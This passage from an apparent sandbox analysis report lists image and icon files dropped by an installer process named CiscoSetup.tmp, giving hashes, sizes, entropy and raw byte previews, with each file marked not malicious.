                                                                                                                                                                                                  SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                                                                                  MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                                                                                  SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                                                                                  SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                                                                                  SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Mh]W.........CH..#...5.R.R..h$...'e.Cj.T.g....G...Z..v.aB..w..K.I..E.).....d..."]g...P.l.u..>{.?....@..u.>.......g=.....|.:D..~.........|(...q[.g.d.......~..9r.w...'...pnn.P..D$.xx(?..K"..r..9.I.....L.t.9.A\B.D.....^&...e.'.._Bk..M....$|....?....k=...:...N..N..{2*..a/~.UO..t*...'cuu....~.....zB*......IHS.T9!......|.. q.?}......].M,u.|i.90.<.s;y.Q.'..#..FH..3tP.:.i.]6...a.I0'.J...Rt2.!..I.c.}Q.'cyy.R.'uF...j..Sxy.u..}F..{D..H2G...1.`.R.......:..g.}D.Y....y..O=....7|`..].Eg..4.&.....[mzd.9.e......{.}.;.e'`u.sB..M...;#}.I.%R......Dd=.z..#.Q...;..j.E...;...o...b.D.p.v..I.L.\"i.\2.GD."G..ti....ui..W.........p.....sS+j...A..........]/F...ybst...4}!.....d.i.....,.M.Y..../.v.......Q...He....DM.;V.&:^......D.ka.l....^.....{...L......F........=...yB..U.#.QwD.<!....5.ZO...0yB^.........K#L...^.]....(.R.X.d.+.'y?..d."T:OH..s...J?{E|.....;....)....o.=.:+ZUp..H{{{......F.;[.8...H......
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.7071518309363354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                                                                                  MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                                                                                  SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                                                                                  SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                                                                                  SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P..........!...................................................................!.................................... .....................,3..................................................................#,.............................................kY.M'..M'.. *%..5C..........................-9..-9..........................(2..0;u.......................0............cB+.M'..M'..M'..X5..z]J......y.......................1=..1=......................[q...'........................0.........xh.M'..M'..X5........................#......................................................DU*................... ........nP:.M'..M'....w..........................,0..az...................'...'..................7F..9G.............................z]J.M'..X5..............................................................................|....#.................................M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2213
                                                                                                                                                                                                  Entropy (8bit):4.905752993252195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                                                                                  MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                                                                                  SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                                                                                  SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                                                                                  SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......&.....2b.5....PLTE...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h....pHYs................ iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 20
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3882
                                                                                                                                                                                                  Entropy (8bit):6.743390042757195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                                                                                  MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                                                                                  SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                                                                                  SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                                                                                  SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):421
                                                                                                                                                                                                  Entropy (8bit):7.268682924293009
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                                                                                  MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                                                                                  SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                                                                                  SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                                                                                  SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....WIDATH..U.m.0..".`...n@&..N.J..e.Ke.t.....x.2.#T.v...Z=)R..w.>.3r..*~.....k.k.).q....^.....`.k..'.tG.......X.:Kf..=..7-........Md..`.....L.H.{..K.%D.~.i.$.F..z....*]Q....Y@.f..D...C|j.!\gi...q..R.1...2..K.....=..,..%...p+.(iW....#......r....N...=........C.8[..\<.a....2[n....B, #...u.09......a...;........._U.)K2...pb.LW...~^.......hSX.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75452
                                                                                                                                                                                                  Entropy (8bit):6.447447333863436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                                                                                  MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                                                                                  SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                                                                                  SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                                                                                  SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....H.(Z.1.<....C{@{..\..-...X.....<.....,5.!)..2S.x(.^k.LS.P....4..................................................................................................................%Y.]"".......c.K. ..X.rH'./.5.#...]..........O.S...2..s:...}P.%B. ....Y.P....@.....0.......,.(.da@. ....Y.P....@.....0.......,.(.da@. ..JG.W....w.$...^.o|.[..\.G..=.........k....#..SJ...nm..h..O7%c.2....)....hh.;.Z...e^...c.a.q.,....{.oe...Q..a5g..^.6e^...#B.k..a/%..{aL....0.......,.(.da@. ....Y.P....@.....0.....e..o.{..+".L...wg..~i..PN0......-..z.Z.Yg)..1........m..7...r.Gw..7.$..N.0.*.sW......d@...4..i...P.@D|;5?t0.+........P....@.....0.......,.(.da@. ....Y.P....@.....0..../...7.....kW...i..T...6..F..A#+..s.......(.`....V.-*Z.kCI..>.PN.....eE;.?ou.N...}.k7..\........R.X...w.....}_...#.|..s^....&..z....Z.....8.d)`..9kY.. ....Y.P....@.....0.......,.(..9.n.np....y{W..\.....N0p.j .4.'..&................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4370
                                                                                                                                                                                                  Entropy (8bit):7.900909498577029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                                                                                  MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                                                                                  SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                                                                                  SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                                                                                  SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3683
                                                                                                                                                                                                  Entropy (8bit):7.90204028759812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                                                                                  MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                                                                                  SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                                                                                  SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                                                                                  SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12068
                                                                                                                                                                                                  Entropy (8bit):7.961027992023309
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                                                                                  MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                                                                                  SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                                                                                  SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                                                                                  SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx...l....q.a_...n`.p.l..].!.X.cmb.T{W/8.6..6......%".T..yO)"...e!..5....[.+.;..y....RX..s..@[.&.6..j...1..sf..93..I.....;.......(F...-5>P....(.`..T|..P...}.D.H....R.L..8.....1...$.....A.X?.sb..;@...h9.wJ.;._.)eM........Ss...........4..o.............P[j.E.~.TE..0.......ro../.PA..SjK..8A.Zs..eE..X.!...<Y..Z.rr\J.}w.....?e......`..X.c. %......p.z4M7.PC........&.6.......".1c..>...^.d..S.9../s..O... ..4.j.]S<.>u..v.d6..1..S.@.N.y..=...;...9v..=...wB..Y...%.D..$..b...6u....wM...#......w..-.g...F!...he.O..r.2.....Qj..{D.\.we}.....D. ...(...$Z...?.U......r3k.o.'R.M........s....W..h.Hm.q).U.Z...}w....;...'v..I...QO.....Q1k:.h%...Ws...UA....!7....w.f].G..X...w..^...VBT$..pQ.,`-Ms.0.H.C.......d .2....\."...."G.=...{:Xgw..Rj...&.(.e..-C..+.(.)......a...n...'.I..@...8b.'.v."..r.BF./.....`...1.$Z.T$.WE.Y5sWes.:......}:./.y.DK..R.j.B.....YQ..X d|a.^.......F.D+.|..(.....KZ....(.,8~...,".y.H=.! ....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76615
                                                                                                                                                                                                  Entropy (8bit):6.470162664157233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                                                                                  MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                                                                                  SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                                                                                  SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                                                                                  SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....8.(`.T.E...D0..n.............\..;..`G.'...2.....W/.?[.$.y..j...gY.......................................................................................................................W..Tus7..%......m.....Bx.Bx.w......P.QU7.B.gW...k]?;T....J.s....i`9g...m...R{,1e...S...+3V.P..@......"......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!.............G.<...k~..~.B.p....}.d(........>..V.7......~.&..m[...(.{s[.......S..=.0.>..........0p.......aP.4...R.&...I.K.s......=...=.K.Vu.".b.l...Q.(.D!......@....Q.(.D!......@....QX..D......1\h....}}...;}|>.e....;..\t.tE.........9"}|9..&.m.S+...-m:.C3y.K..!..b....mi.....b.>~;..f...f.....S.P...g.......P..B@. ....(.....P..B@. ....(.....P..B@. ....(.....P ....%.P...e......u;.k...&.......=.....h..2(....=..%..A....yH..-..}<...IX.=......yO..U....>yImj[......'.;...B@...i..-.S.n..tnk..m.:..>v......5.g.SI'..f.K.U..e.{......6...+.3y..-:.x..f...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1577
                                                                                                                                                                                                  Entropy (8bit):5.942243839150427
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                                                                                  MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                                                                                  SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                                                                                  SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                                                                                  SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.020486157649533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                                                                                  MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                                                                                  SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                                                                                  SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                                                                                  SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T17:58:51-04:00" xmp:MetadataDate="2018-10-19T17:58:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c57f0649-d423-40eb-938e-eeff8347c1a5" xmpMM:DocumentID="xmp.did:c57f0649-d423-40eb-938e-eeff8347c1a5"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0468421318534369
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                                                                                  MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                                                                                  SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                                                                                  SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                                                                                  SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388
                                                                                                                                                                                                  Entropy (8bit):7.139959170245274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                                                                                  MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                                                                                  SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                                                                                  SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                                                                                  SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....6IDATH...M.0.E.L....&hG..t...f.........F`.l..}n.....B..).....}.p.k....x..3n|oI.^..G._~%..3...7~.^...#D..]/.lD.....{...#..:...k..+n.U.....)".]'g...9Y...G.w^v.&.FX{....".i.k.:..bN.......b.(H......8.y. .E...s$.V.....U.sOwFo.#...a;:....2.....=.....P...ct.k.A..-....Q...<..R...$.FX.-M......k.W...b.}2o.....p.........IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4732129504366194
